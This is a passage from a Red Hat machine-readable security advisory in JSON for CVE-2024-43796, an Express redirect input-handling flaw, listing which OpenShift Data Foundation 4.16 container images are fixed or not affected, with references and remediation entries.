"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
